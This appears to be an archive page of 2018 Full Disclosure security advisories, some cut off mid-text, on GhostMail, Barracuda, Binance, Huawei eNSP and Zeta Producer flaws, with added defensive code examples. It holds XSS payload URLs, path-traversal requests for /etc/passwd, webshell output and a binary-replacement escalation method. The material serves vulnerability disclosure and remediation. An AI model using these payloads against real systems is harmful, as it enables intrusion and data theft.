Script Code Injection


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
Sign up to military grade encrypted GhostMail and enjoy instant free and
secure email & chat. No download or installs needed.
GhostMail is your new secure email & chat platform, with great features
like self destruction, two factor login and much more...
Join free today and start enforcing your privacy and online rights.

(Copy of the Vendor Homepage: https://www.ghostmail.com/ )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered an
application-side vulnerability in the official GhostMail chat online
service web-application.


Vulnerability Disclosure Timeline:
==
2018-06-27: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

GhostCom Ltd.
Product: GhostMail (Chat) - Web Application (Online Service) 2015 Q2


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted authentication (user/moderator) - User privileges


User Interaction:
=
Low User Interaction


Disclosure Type:

Bug Bounty Program


Technical Details & Description:

An application-side html injection web vulnerability has been discovered in
the official GhostMail chat web-application. The vulnerability allows
injecting unauthorized malicious script codes on the application-side of the
affected module.

The issue exists in the chat status of the application and is remotely
exploitable against other ghostmail user accounts. The request method to
inject is POST and the attack vector is located on the application-side of the
affected online service web-application. The encoding of the status message in
the chat client is broken. Local and remote attackers can use the lack of
validation to perform html injection attacks to compromise
user/moderator/admin session data.

The security risk of the html injection web vulnerability is estimated as
medium with a cvss count of 4.0. Exploitation of the issue requires a low
privileged web-application user account and no direct user interaction.
Successful exploitation of the application-side vulnerability results in
session hijacking, persistent phishing, persistent external redirects and
persistent manipulation of affected or connected module context.

Vulnerable Domain(s):
[+] Ghostmail.com

Vulnerable Module(s):
[+] Status Message

Vulnerable Parameter(s):
[+] Status message body context


Proof of Concept (PoC):
===
The html injection web vulnerability can be exploited by local and remote
attackers with low user interaction and a low privileged application user
account. For security demonstration or to reproduce the security vulnerability
follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Register an account and login to the ghostmail application
2. Move to the chat status contents
3. Close the tag of title with double quote "
4. Now, add a new malicious content as payload in the status title for the chat
5. Start to chat and in the same moment the execution of the script code
   occurs at both party sides of the client
6. Successful reproduction of the vulnerability!

Note: There is no filter validation or mechanism in place to prevent an
execution within the ghostmail web-application.

Reference(s):
https://www.ghostmail.com/


Solution - Fix & Patch:
===
The vulnerability can be patched by parsing and encoding the vulnerable status
message in the ghostmail chat client.
The issue has been reported in 2016 Q4 (2016-10-01) and was finally resolved
in 2017 Q3 - Q4 by the ghostmail developer team.


Security Risk:
==
The security risk of the application-side input validation web
vulnerability in the chat module is estimated as medium (CVSS 4.0).


Credits & Authors:
==========
Vulnerability-Lab [resea...@vulnerability-lab.com] -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab



[FD] GhostMail - (filename to link) POST Inject Web Vulnerability

2018-07-18 Thread Vulnerability Lab
he input and disallow special chars. Escape the web context to
prevent an application-side script code execution vulnerability.

The vulnerability has been reported on 2016-10-01. The issue was resolved
during 2017 Q2 - Q4 by the ghost mail developer team.


Security Risk:
==
The security risk of the application-side input validation web vulnerability
in the ghostmail mail module is estimated as medium (CVSS 4.2).


Credits & Authors:
==
Vulnerability-Lab [resea...@vulnerability-lab.com] -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab







[FD] Binance v1.5.0 - Insecure File Permission Vulnerability

2018-07-18 Thread Vulnerability Lab
Document Title:
===
Binance v1.5.0 - Insecure File Permission Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2135


Release Date:
=
2018-07-17


Vulnerability Laboratory ID (VL-ID):

2135


Common Vulnerability Scoring System:

2.5


Vulnerability Class:

Access Permission Weakness


Current Estimated Price:

500€ - 1.000€


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered an
insecure file permission vulnerability in the Binance v1.5.0 software.



Vulnerability Disclosure Timeline:
==
2018-07-15: Researcher Notification & Coordination (Security Researcher)
2018-07-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Binance
Product: Binance 1.5.0


Exploitation Technique:
===
Local


Severity Level:
===
Low


Authentication Type:

Full authentication (admin) - full privileges


User Interaction:
=
Medium User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

An insecure file permissions vulnerability has been discovered in the official
Binance v1.5.0 software. The vulnerability allows local attackers to exploit an
insecure permissions setup for a software or process by manipulation.

The vulnerability exists due to insecure default permissions set on
Binance.exe, start.exe and unins000.exe. There are no integrity checks or
validation proof to ensure that the executable file is not modified during the
runtime or after it. A local attacker could exploit the local vulnerability by
replacing `Binance.exe` and `start.exe` or `unins000.exe` with a malicious
executable file. The malicious file could execute or modify with the
LocalSystem permissions to follow up with successful exploitation.


Proof of Concept (PoC):
===
Binance for Windows contains a vulnerability that could allow a local attacker
to gain elevated privileges. For security demonstration or to reproduce the
vulnerability follow the provided information and steps below.


-- PoC Session Logs (Permissions) --
C:\Binance>icacls binance.exe
Binance.exe BUILTIN\Administrateurs:(I)(F) <--- Full Access
 AUTORITE NT\Système:(I)(F)
 BUILTIN\Utilisateurs:(I)(RX)
 AUTORITE NT\Utilisateurs authentifiés:(I)(M)   <--- Modify

Information: 1 files correctly processed; 0 files failed to process

C:\Binance>icacls start.exe
start.exe BUILTIN\Administrateurs:(I)(F) <--- Full Access
 AUTORITE NT\Système:(I)(F)
 BUILTIN\Utilisateurs:(I)(RX)
 AUTORITE NT\Utilisateurs authentifiés:(I)(M) <--- Modify

Information: 1 files correctly processed; 0 files failed to process

C:\Binance>icacls unins000.exe
unins000.exe BUILTIN\Administrateurs:(I)(F)   <--- Full Access
 AUTORITE NT\Système:(I)(F)
 BUILTIN\Utilisateurs:(I)(RX)
 AUTORITE NT\Utilisateurs authentifiés:(I)(M)<--- Modify

Information: 1 files correctly processed; 0 files failed to process


Solution - Fix & Patch:
===
Include multiple integrity checks for the software files on startup and
during the static runtime.
Change the access permissions for the process of all three executable
files (Binance.exe, start.exe & unins000.exe).


Security Risk:
==
The security risk of the insecure file permissions vulnerability and
missing integrity check in the software core is estimated as low.


Credits & Authors:
==
ZwX [Vulnerability Laboratory - Security Manager] -
https://www.vulnerability-lab.com/show.php?user=ZwX


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com   www.vuln-lab.com

www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com  paste.vulnerability
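The icacls listings above show Modify for Authenticated Users on all three executables, which is what lets any local account swap the binary. The parser below is an added example, not part of the advisory: it reads icacls output, including the French-localised principal names shown in the PoC, and reports every ACE that grants write-class rights to a low-privilege principal, which is how one would audit an installation directory for this class of weakness. `SAMPLE_ICACLS` is a constructed listing modelled on the PoC, with the second file shown already hardened to read/execute; file names without spaces are assumed.

```python
import re

PROMPT_RE = re.compile(r'>\s*icacls\b')  # echoed command lines such as C:\Binance>icacls x.exe
INHERITANCE_FLAGS = {'I', 'OI', 'CI', 'IO', 'NP'}  # describe propagation, not access
# Rights that let a principal replace or alter the file: full, modify, write,
# write-data, append-data, write-attributes/EA, delete, delete-child.
WRITE_RIGHTS = {'F', 'M', 'W', 'WD', 'AD', 'WA', 'WEA', 'D', 'DC'}
# Well-known low-privilege principals in English and in the French
# localisation seen in the PoC listing above.
LOW_PRIVILEGE_PRINCIPALS = {
    r'BUILTIN\Users', r'BUILTIN\Utilisateurs',
    r'NT AUTHORITY\Authenticated Users', r'AUTORITE NT\Utilisateurs authentifiés',
    'Everyone', 'Tout le monde',
}


def parse_icacls(output):
    """Parse `icacls <file>` output into (file, principal, rights) tuples.

    The first ACE of a file shares its line with the file name; the remaining
    ACEs are indented. Inheritance flags are dropped so that rights compare
    on access alone.
    """
    entries = []
    current_file = None
    for raw in output.splitlines():
        if not raw.strip() or PROMPT_RE.search(raw):
            continue
        if raw.startswith(('Information:', 'Successfully processed')):
            continue
        if raw[0].isspace():
            ace = raw.strip()
        else:
            current_file, _, ace = raw.partition(' ')
        principal, sep, rights_text = ace.partition(':(')
        if not sep:
            continue
        rights = set(re.findall(r'\(([^)]*)\)', '(' + rights_text)) - INHERITANCE_FLAGS
        entries.append((current_file, principal.strip(), rights))
    return entries


def find_weak_aces(output):
    """Return every ACE that gives a low-privilege principal write-class rights."""
    return [(path, principal, sorted(rights))
            for path, principal, rights in parse_icacls(output)
            if principal in LOW_PRIVILEGE_PRINCIPALS and rights & WRITE_RIGHTS]


# Constructed listing modelled on the PoC: Binance.exe as reported, start.exe
# as it would look once Authenticated Users are reduced to read/execute.
SAMPLE_ICACLS = r"""C:\Binance>icacls binance.exe
Binance.exe BUILTIN\Administrateurs:(I)(F) <--- Full Access
 AUTORITE NT\Système:(I)(F)
 BUILTIN\Utilisateurs:(I)(RX)
 AUTORITE NT\Utilisateurs authentifiés:(I)(M)   <--- Modify

Information: 1 files correctly processed; 0 files failed to process

C:\Binance>icacls start.exe
start.exe BUILTIN\Administrateurs:(I)(F)
 AUTORITE NT\Système:(I)(F)
 BUILTIN\Utilisateurs:(I)(RX)
 AUTORITE NT\Utilisateurs authentifiés:(I)(RX)
"""
```

The fix the advisory asks for corresponds to removing the Modify grant so that only Administrators and SYSTEM can write to the installed binaries, and to checking file integrity (for example the Authenticode signature) before the executable is launched.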

[FD] Barracuda Cloud Control 7.1.1.003 - Cross Site Scripting Vulnerability

2018-07-18 Thread Vulnerability Lab
ank You   



Your Barracuda Networks user has been created.
Please follow the instructions emailed to b...@evolution-sec.com
20%3E%3Ca%20%3E%20>"<%20
to log in and create an account.



.create_success {
padding: 15px;
background: url('/cui/images/checkbox.png') center 50px no-repeat;
text-align: center;
}
.create_success h2 {
font-size: 150%;
padding-bottom: 90px;
}
.create_success p {
font-size: 125%;
text-align: center;
}


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET
https://cc.localhost:8000/new_user/success/?email=bkm%40evolution-sec.com%20%3E%3Ca%20%3E%20>"<%20
Mime Type[text/html]
Request Header:
  Host[cc.localhost:8000]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:49.0)
Gecko/20100101 Firefox/49.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Cookie[backup_session=03d2d8r7cf752jknkc9esfhet5;
CLOUD_LOCALE=en_US; BNI_CLOUD_AT=1f20800a5000;
_ga=GA1.2.1374742774.1477554133; _gat=1; mfa=0;
CLOUD_LAST_LOCALE=en_US; cloud_session=44kti8ik7qdnb57kdfftfehje3]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
Response Header:
  Date[x]
  X-Frame-Options[SAMEORIGIN]
  Cache-Control[no-store, no-cache, must-revalidate, post-check=0,
pre-check=0]
  Pragma[no-cache]
  Set-Cookie[CLOUD_LOCALE=en_US; expires=Tue, 25-Apr-2017 07:44:45
GMT; Max-Age=15552000; path=/; domain=.localhost:8000; secure
cloud_session=44kti8ik7qdnb57kdfftfehje3; path=/; domain=.localhost:8000
BNI_CLOUD_AT=1f20800a5000; Path=/]
  X-Cloud-Auth[0]
  Vary[Accept-Encoding,User-Agent]
  Connection[Keep-Alive]
  Content-Type[text/html; charset=UTF-8]
  Transfer-Encoding[chunked]


Reference(s):
https://cc.localhost:8000/
https://cc.localhost:8000/new_user/
https://cc.localhost:8000/new_user/success/


Solution - Fix & Patch:
===
The vulnerability can be patched by parsing the vulnerable email
parameter in the thank-you registration page of the Barracuda Networks CC
application. Parse the source in the vulnerable output location to prevent
the execution of the client-side injected payloads. Disallow the usage of
special chars in parameter requests via the GET method.


Security Risk:
==
The security risk of the client-side cross site scripting web
vulnerability in the cloud control web-application is estimated as medium.


Credits & Authors:
==
Benjamin K.M. (Vulnerability Laboratory Core Research Team) -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.

Domains:    www.vulnerability-lab.com   - www.vulnerability-db.com   - www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php   - vulnerability-lab.com/list-of-bug-bounty-programs.php   - vulnerability-lab.com/register.php
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php
Social:     twitter.com/vuln_lab   - facebook.com/VulnerabilityLab   - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark
of vulnerability-lab team & the specific authors or managers. To

[FD] Barracuda Cloud Control v3.020 - CS Cross Site Vulnerability

2018-07-18 Thread Vulnerability Lab
oss Site Scripting PoC
https://bcc.127.0.0.1:1336/cgi-mod/index.cgi?password=befc663e87db8e886c5d8afe5f73cc3e&et=1342741957&;
primary_tab=BASIC&new_secondary_tab=user_management&auth_type=Local&nodeid=13633&locale=de_DE&
secondary_tab=edit_user&page_submitted=550a4ef30b4d0aa5d5435c2f09b3c09c&content_only=1&target_user=
1337benny%40barracuda.com">http://www.vulnerability-lab.com
onload=alert("VulnerabilityLab") <
&tree_name=devices&tree_filter=bccadmin&user=benny%40barracuda.com&ispopup=1&parent_name=
user_management&popup_width=800&popup_height=500>




PoC: INDEX.CGI - Mail Listing (Output) (Benutzer bearbeiten >
Benutzerspezifische Bayessche Daten) [target_user]

 
Benutzerspezifische Bayessche Daten:
1337be...@barracuda.com"><[EXECUTION OF
CLIENT SIDE SCRIPT CODE!])' <<="" td="">
 



Reference(s):
https://bcc.127.0.0.1:1336/
https://bcc.127.0.0.1:1336/cgi-mod/
https://bcc.127.0.0.1:1336/cgi-mod/index.cgi


Solution - Fix & Patch:
===
The vulnerability can be patched by secure parsing and encoding of the
vulnerable index.cgi file. Restrict the input of the vulnerable marked
values and disallow the usage of special chars. Use entities and filter
all inputs with exception handling to prevent client-side exploitation.


Note: The issue was reported in 2016 Q4 to the Barracuda Networks
developer team. The issue was finally resolved in 2017 Q3 - Q4.
The disclosure process took about 8 months to complete, taking the
vendor's patch cycle into account.


Security Risk:
==
The security risk of the non-persistent cross site scripting
vulnerability in the target_user value parameter is estimated as medium.


Credits & Authors:
==
Vulnerability-Lab [resea...@vulnerability-lab.com] -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab






-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Huawei eNSP v1 - Buffer Overflow (DoS) Vulnerability

2018-07-13 Thread Vulnerability Lab
Document Title:
===
Huawei eNSP v1 - Buffer Overflow (DoS) Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2132

Security ID: huawei-sa-20180309-01-ensp

https://nvd.nist.gov/vuln/detail/CVE-2017-17321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17321

Acknowledgements:
https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20180309-01-ensp-en

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-17321

CVE-ID:
===
CVE-2017-17321


Release Date:
=
2018-07-13


Vulnerability Laboratory ID (VL-ID):

2132


Common Vulnerability Scoring System:

3.3


Vulnerability Class:

Buffer Overflow


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Enterprise Network Simulation Platform (eNSP) is a free, scalable,
graphical network simulation platform developed by Huawei.
Huawei eNSP is management and support software offered as a service.

(Copy of the Homepage:
https://support.huawei.com/enterprise/en/network-management/ensp-pid-9017384
)


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a buffer
overflow causing a denial of service in the official Huawei eNSP v1.


Vulnerability Disclosure Timeline:
==
2018-07-13: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Huawei
Product: eNSP v100R002C00B510 v100R002C00B500

Huawei
Product: eNSP V100R002C00B390 V100R002C00B380 V100R002C00B370 V100R002C00B

Huawei
Product: eNSP V100R002C00B210 V100R002C00B200

Huawei
Product: eNSP V100R002C00B120 V100R002C00B110 V100R002C00B100


Exploitation Technique:
===
Local


Severity Level:
===
Medium


Authentication Type:

Restricted authentication (user/moderator) - User privileges


User Interaction:
=
No User Interaction


Disclosure Type:

Responsible Disclosure Program


Technical Details & Description:

A buffer overflow causing a denial of service vulnerability has been
discovered in the official Huawei eNSP v1.
The vulnerability allows an attacker to crash or shut down the
software process through unexpected behavior.

Huawei eNSP is vulnerable to a buffer overflow resulting in a denial of
service, caused by improper validation of a specific command line
parameter. A local authenticated attacker could exploit the vulnerability
to cause the software process to become abnormal, with unexpected behavior
and unhandled errors, by sending specially crafted packet requests.


Solution - Fix & Patch:
===
Huawei has released software updates to fix this security vulnerability.
Customers of the product should contact Huawei TAC (Huawei Technical
Assistance Center) to request the upgrade contents. This advisory is
available at the following link:
http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20180309-01-ensp-en


Security Risk:
==
The security risk of the buffer overflow causing a denial of service and
unhandled unexpected errors in the Huawei eNSP v1 is estimated as medium.


Credits & Authors:
==
S.AbenMassaoud [Vulnerability Laboratory Core Research Team] -
https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud



[FD] HackRF Circuit Board - New Universal Case for Devs & Pentesters

2018-07-12 Thread Vulnerability Lab
Document Title:
===
HackRF Circuit Board - New Universal Case for Devs & Pentesters


References:
===
https://www.vulnerability-lab.com/get_content.php?id=2134

Download: https://www.vulnerability-lab.com/resources/documents/2134.rar

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2018/07/11/new-hackrf-case-devs-pentesters-released-abs-pla


Release Date:
=
2018-07-11


Vulnerability Disclosure Timeline:
==
2018-07-11: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Technical Details & Description:

Normally the HackRF is delivered with a hard metal case, metal plates
and some screws, as you can see in the following picture.

In all our tests and developments, the case was mainly useless because
of the device access and weight.

The following print includes a special 3-part case for the HackRF device
(PLA or ABS). The 3-part case allows you to interact with the board
while it is running. The first part is the main part that holds the
HackRF board safely. The size of the case has been optimized for the board
for handy usage.

Next to that, the weight of the new case is much lower. The case is
handier and slimmer cut, although it has all the information elements
of the original case. The first and third parts of the case show all
information of the device with the specific declarations (clkin,
clkout, usb, leds and more); one part is directly connected to the lower
part, the third part is attached like a cover.

In the regular metal case you have to use the screws; in the new case
there is no requirement for them anymore because the
board is already stabilised through the pin holes with the basic nut bolt.

Using ABS is a better solution for this case than using PLA, to
make the case more heat resistant. The full case with the SLDPRT
(Editable) and STL (Print) files can be downloaded from the official
Vulnerability Laboratory page in the documents section. Enjoy using
and sharing the new HackRF case for your developments or pentests.


Credits & Authors:
==
Vulnerability Laboratory [Core Research Team]



#hackrf #case #3dprinter

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SEC Consult SA-20180712-0 :: Remote Code Execution & Local File Disclosure in Zeta Producer Desktop CMS

2018-07-12 Thread SEC Consult Vulnerability Lab

  
  
SEC Consult Vulnerability Lab Security Advisory < 20180712-0 >
===
  title: Remote Code Execution & Local File Disclosure
product: Zeta Producer Desktop CMS
 vulnerable version: <=14.2.0
  fixed version: >=14.2.1
 CVE number: CVE-2018-13981, CVE-2018-13980
 impact: critical
   homepage: https://www.zeta-producer.com
  found: 2017-11-25
 by: P. Morimoto (Office Bangkok)
 SEC Consult Vulnerability Lab 

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"With Zeta Producer, the website builder and online shop system for Windows, 
you can create and manage your website locally, on your computer. 
Get without expertise in 3 steps to your own homepage: select design, 
paste content, publish website. Finished."

Source: https://www.zeta-producer.com/de/index.html


Business recommendation:

The vendor provides a patched version which should be installed immediately.

Users of the product also need to verify that the affected widgets are updated in
the corresponding website project! It could be necessary to rebuild the whole project
or copy the new widgets to the website projects. For further information consult the
vendor.

Furthermore, an in-depth security analysis is highly advised, as the software may be
affected from further security issues.


Vulnerability overview/description:
---
1) Remote Code Execution (CVE-2018-13981)
The email contact functionality of the widget "formmailer" can upload files
to the server but if the user uploads a PHP script with a .php extension 
then the server will rename it to .phps to prevent PHP code execution.

However, the attacker can upload .php5 or .phtml to the server without any 
restriction. These alternative file extensions can be executed as PHP code. 

Furthermore, the server will create a folder to store the files, with a
random name using PHP's "uniqid" function.

Unfortunately, if the server permits directory listing, the attacker
can easily browse to the uploaded PHP script. If no directory listing is 
enabled the attacker can still bruteforce the random name to gain remote 
code execution via the PHP script as well. Testing on a local server it 
took about 20 seconds to brute force the random name. This attack will 
be slower over the Internet but it is still feasible.

Also, if the user runs the Zeta Producer Desktop CMS GUI client locally,
they are also vulnerable because the web server will be running on TCP port 9153.

The root cause is in the widget "formmailer" which is enabled by default.
The following files are affected:
- /assets/php/formmailer/SendEmail.php
- /assets/php/formmailer/functions.php


2) Local File Disclosure (CVE-2018-13980)
If the user enables the widget "filebrowser" on Zeta Producer Desktop CMS an 
unauthenticated attacker can read local files by exploiting path traversal issues. 

The following files are affected:
- /assets/php/filebrowser/filebrowser.main.php


Proof of concept:
-
1) Remote Code Execution (CVE-2018-13981)
The following python script can be used to exploit the chain of vulnerabilities.
[.. code has been removed to prevent misuses ..]

When the script is executed, a PHP script (shell) will be uploaded automatically.
# $ python exploit.py
# [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php
#
# 5a1a5bc991afe
# 5a1a5bc99453a
# 10812
# [*] Found :  http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5
# uid=33(www-data) gid=33(www-data) groups=33(www-data)


2) Local File Disclosure (CVE-2018-13980)
The parameter "file" in the "filebrowser.main.php" script can be exploited to read
arbitrary files from the OS with the privileges of the web server user.
Any unauthenticated user can exploit this issue!

http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc&do=list


Vulnerable / tested versions:
-
The following versions have been tested which were the latest version available 
at the time of the test:

Zeta Producer Desktop CMS 14.1.0
Zeta Producer Desktop CMS 14.2.0

Source: 
- https://www.zeta-producer.com/de/download.html
- https://github.com/ZetaSoftware/zeta-producer-content/


Vendor contact timeline:

2017-11-29: Contacting vendor through i...@zeta-producer.com and various other
email addresse
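
As an added defender-side example (not SEC Consult's withheld PoC and not Zeta Producer's own code), the following Python covers the three weaknesses described in the Zeta Producer post above: the extension denylist that only renamed .php to .phps and let .php5 and .phtml through, the time-derived uniqid() upload folder name that could be brute-forced, and the "file" parameter of the file browser that accepted "../" traversal. The allowlist, the base directory and the sample file names are assumptions chosen for the illustration.

```python
import os
import secrets
from pathlib import Path
from typing import Optional

# Constructed allowlist policy (not from the advisory). The advisory describes a
# denylist that only renamed ".php" to ".phps", which let ".php5" and ".phtml"
# through; an allowlist of expected document types avoids that class of bypass.
ALLOWED_UPLOAD_EXTENSIONS = frozenset({".pdf", ".png", ".jpg", ".jpeg", ".txt"})


def upload_extension_allowed(filename: str) -> bool:
    """Accept a filename only if its final extension is on the allowlist.

    Only the last suffix is considered, lowercased, so "shell.php5",
    "shell.phtml", "shell.PHP" and "photo.jpg.phtml" are all rejected.
    """
    suffix = Path(filename).suffix.lower()
    return suffix in ALLOWED_UPLOAD_EXTENSIONS


def new_upload_dir_name() -> str:
    """Return an unpredictable directory name for a new upload.

    The advisory notes that the PHP uniqid() name was brute-forced in about
    20 seconds locally; it is derived from the clock. secrets draws 128 bits
    from the OS CSPRNG, which cannot be narrowed down from request timing.
    """
    return "upload_" + secrets.token_hex(16)


def resolve_within_base(base_dir: str, requested: str) -> Optional[str]:
    """Resolve a user-supplied path relative to base_dir, or return None.

    Rejects empty and absolute paths, backslashes and NUL bytes up front,
    then canonicalises both sides with realpath so "../" segments and
    symlinks are collapsed before the containment check. This is the check
    a file browser's "file" parameter needs before any read or listing.
    """
    if not requested or requested.startswith("/") or "\\" in requested or "\x00" in requested:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath equals base only when candidate is base itself or below it.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests, modelled on the file names and the
    # traversal pattern quoted in the advisory.
    for name in ("sectest.php5", "shell.phtml", "report.pdf"):
        print(f"{name:14} allowed={upload_extension_allowed(name)}")
    for req in ("docs/readme.txt", "../../../../../../../../../../etc/passwd"):
        print(f"{req:42} -> {resolve_within_base('/var/www/files', req)}")
    print("new upload dir:", new_upload_dir_name())
```

The containment check deliberately compares canonical paths rather than searching the string for "../": encoded or doubled separators and symlinks inside the base directory defeat string matching, while realpath plus commonpath decides on where the path actually ends up.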

[FD] Barracuda ADC v5.x - Multiple Persistent Vulnerabilities

2018-07-12 Thread Vulnerability Lab
Connection[keep-alive]
   Response Header:
  Server[BarracudaHTTP 4.0]
  Content-Type[text/html; charset=utf-8]
  Connection[keep-alive]
  Set-Cookie[_ga=GA1.2.608616028.1422207688; path=/_gat=1; path=/]
  Content-Length[112822]
  Pragma[no-cache]
  X-Frame-Options[SAMEORIGIN]


Reference(s):
http://adc.localhost:8080/
http://adc.localhost:8080/cgi-mod/index.cgi
http://adc.localhost:8080/cgi-mod/build_status_expiration_display_content.cgi


Solution - Fix & Patch:
===
The vulnerability can be patched by secure parsing and encoding of the
vulnerable last hour, last day and last week input field values.
Restrict the input and disallow special chars. Filter the context of the
values to prevent an execution of script code and implement
a secure validation mechanism for the broken output in the dashboard service.

Note: The issue was reported in 2016 to the barracuda networks developer
team. The issue was finally resolved in 2017 Q1 - Q4.
The disclosure process took about 1 year to complete by recognizing the
patch cycle.


Security Risk:
==
The security risk of the persistent input validation web vulnerability
in the barracuda networks adc appliance web-application is estimated as
medium.



Credits & Authors:
==
Benjamin K.M. (Vulnerability Laboratory Core Research Team) -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
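
As an added defender-side illustration (not code from Barracuda Networks and not part of the Vulnerability Lab posts), the following Python shows the two controls the solution sections of the Barracuda Cloud Control 7.1.1.003, Cloud Control v3.020 and ADC posts above ask for: validating the reflected parameter on input, and encoding it at the point where it is written into HTML. The success-page template, the request URL and the e-mail address are constructed; only the shape of the reflected "email" parameter follows the first post's session log.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed template, modelled on the "user created" page quoted in the
# Barracuda Cloud Control post; the exact markup is an assumption.
_TEMPLATE = (
    '<div class="create_success"><h2>Thank You</h2>'
    "<p>Please follow the instructions emailed to {email} to log in.</p></div>"
)

# Conservative address shape for input validation: enough to reject anything
# that could carry markup or quotes, not a full RFC 5322 parser.
_EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def email_from_url(url: str) -> str:
    """Pull the first 'email' query value out of a request URL (URL-decoded)."""
    return parse_qs(urlsplit(url).query).get("email", [""])[0]


def valid_email(email: str) -> bool:
    """Input validation: accept only a plain address, nothing else."""
    return _EMAIL_RE.match(email) is not None


def render_success_unsafe(email: str) -> str:
    """The pattern the posts describe: the parameter echoed into HTML as-is."""
    return _TEMPLATE.format(email=email)


def render_success(email: str) -> str:
    """Output encoding for an HTML text node: < > & " ' become entities, so
    whatever the parameter contains is displayed as text, never parsed."""
    return _TEMPLATE.format(email=html.escape(email, quote=True))


def handle_success_request(url: str) -> str:
    """Validate first, then encode on output: both layers the fixes call for.

    Encoding alone already stops the injection; validation additionally
    keeps junk out of logs, e-mails and any later non-HTML sink.
    """
    email = email_from_url(url)
    if not valid_email(email):
        return _TEMPLATE.format(email="the address you provided")
    return render_success(email)


if __name__ == "__main__":
    # Constructed request: an address followed by a stray tag, URL-encoded
    # the way the session log in the first post shows it.
    url = "https://cc.example.test/new_user/success/?email=user%40example.com%20%3E%3Ca%20%3E"
    print("unsafe:", render_success_unsafe(email_from_url(url)))
    print("safe:  ", handle_success_request(url))
```

The same two-layer pattern applies to the index.cgi "target_user" value and the ADC dashboard fields: encode for the context the value lands in (HTML text here; attribute or JavaScript contexts need their own encoders) and keep the input check as a separate, stricter gate.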

